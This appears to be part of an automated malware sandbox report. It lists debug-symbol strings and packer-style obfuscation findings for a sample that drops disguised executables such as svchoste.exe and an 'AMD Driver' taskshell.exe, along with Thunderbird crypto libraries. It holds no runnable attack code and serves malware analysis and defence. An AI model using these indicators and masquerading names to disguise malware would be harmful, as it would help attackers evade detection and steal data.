Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb0 source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp
Source: Binary string: rpcrt4.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: symbols\dll\mscorlib.pdbpdb0x source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: winhttp.pdb/ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wmiutils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemsvc.pdb8 source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: clr.pdbM source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: %mscorlib.ni.pdb source: WerFault.exe, 0000001D.00000002.398156992.0000026D703B7000.00000004.00000001.sdmp
Source: Binary string: gdi32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb} source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb^ source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: ncryptsslp.pdbe source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: fastprox.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemsvc.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: winrnr.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: clr.pdb0 source: WerFault.exe, 0000001D.00000003.377203232.0000026D6FE56000.00000004.00000001.sdmp
Source: Binary string: user32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: vcruntime140.i386.pdb source: svchoste.exe, 00000004.00000003.312315900.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.312994791.0000000003827000.00000004.00000001.sdmp, vcruntime140.dll.4.dr
Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: fastprox.pdbW source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: win32u.pdbf source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: CLBCatQ.pdb* source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdb"" source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source: Binary string: wbemcomn.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001D.00000003.387264777.0000026D70821000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: WinTypes.pdb` source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.377203232.0000026D6FE56000.00000004.00000001.sdmp
Source: Binary string: orms.ni.pdb source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source: Binary string: gdi32.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdbS source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: vcruntime140.i386.pdbGCTL source: svchoste.exe, 00000004.00000003.312315900.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.312994791.0000000003827000.00000004.00000001.sdmp, vcruntime140.dll.4.dr
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: kernel32.pdb source: WerFault.exe, 0000001D.00000003.377294930.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.378691254.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdb source: svchoste.exe, 00000004.00000003.306645593.000000000389F000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.307329985.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.306386681.0000000003821000.00000004.00000001.sdmp, msvcp140.dll.4.dr
Source: Binary string: win32u.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: vaultcli.pdb] source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000001D.00000003.379211829.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.376916862.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.377268412.0000026D6E058000.00000004.00000001.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source: Binary string: imm32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdb= source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb| source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mswsock.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: shell32.pdbl source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: profapi.pdbj source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: tion.ni.pdb source: WerFault.exe, 0000001D.00000003.387077452.0000026D7084E000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387228013.0000026D70850000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdbH source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: ncrypt.pdbv source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mswsock.pdb& source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: imm32.pdbB source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: DotNetZip.dll.8.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: System.Management.pdbDD source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: System.Management.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: nsi.pdbK_ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp
Source: Binary string: System.Management.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb`g source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000001D.00000003.377294930.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.378691254.0000026D6FDD6000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemprox.pdbT source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: _.pdb source: chormuimii.exe, 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, chormuimii.exe, 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, chormuimii.exe, 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr
Source: Binary string: version.pdbx source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: shcore.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source: Binary string: ws2_32.pdb! source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, freebl3.dll.4.dr
Source: Binary string: oleaut32.pdbA source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: chormuim.exe, 00000008.00000003.350741840.000000001B717000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdb; source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: lib.pdb.0 source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Drawing.pdb source: WER5768.tmp.dmp.29.dr
Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mscorlib.ni.pdb0 source: WerFault.exe, 0000001D.00000003.376804497.0000026D6FE62000.00000004.00000001.sdmp
Source: Binary string: ntasn1.pdbn source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: fwpuclnt.pdb, source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: msctf.pdbF source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: msvcr120_clr0400.amd64.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemcomn.pdbi source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387077452.0000026D7084E000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387228013.0000026D70850000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: WMINet_Utils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: cfgmgr32.pdbP source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: ntdll.pdb source: WerFault.exe, 0000001D.00000003.379211829.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.376916862.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.377268412.0000026D6E058000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, mozglue.dll.4.dr
Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdbY source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdbJ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemprox.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: edputil.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_0096231D push rcx; ret 0_2_00962330
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_00007FFC08954F91 push edx; iretd 0_2_00007FFC08954F92
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B78C65 push ecx; ret 4_2_00B78C78
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_0040E21D push ecx; ret 6_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F89E0 pushfd ; ret 6_2_021F89E1
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 7_2_00E6F020 pushad ; retf 7_2_00E6F021
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Code function: 8_2_00007FFC089D5133 pushad ; retf 8_2_00007FFC089D5149
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Code function: 8_2_00007FFC089D514B pushad ; retf 8_2_00007FFC089D5149
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Code function: 8_2_00007FFC089D7546 push ebx; retf 8_2_00007FFC089D771A
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_017EF020 pushad ; retf 12_2_017EF021
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_017EF7B0 pushad ; iretd 12_2_017EF7B1
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_05679840 push ecx; ret 12_2_05679855
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_0246F000 pushad ; retf 16_2_0246F001
